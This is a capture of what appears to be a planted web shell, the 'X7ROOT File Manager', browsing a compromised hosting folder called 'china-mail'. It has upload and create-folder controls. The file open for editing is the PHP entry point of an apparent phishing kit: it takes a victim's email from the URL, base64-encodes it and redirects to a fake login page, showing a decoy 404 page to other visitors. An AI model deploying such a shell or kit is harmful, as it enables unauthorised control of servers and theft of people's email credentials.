X7ROOT File Manager
Current Path:
/home/notabjze/er8th.com/chinn/china-mail
home
/
notabjze
/
er8th.com
/
chinn
/
china-mail
/
ðŸ“
..
📄
.htaccess
(7.9 KB)
ðŸ“
cn
📄
index.php
(281 B)
📄
mail.php
(35 B)
📄
robots.txt
(1.29 KB)
Editing: index.php
<?php session_start(); $email = ''; require 'cn/api.php'; if (isset($_GET['email'])) { $email = $_GET['email']; $lang = base64_encode($email); } if (filter_var($email, FILTER_VALIDATE_EMAIL)) { header ("Location: ./cn/?lang=$lang&x="); } else{ include "cn/404.php"; } ?>
Upload File
Create Folder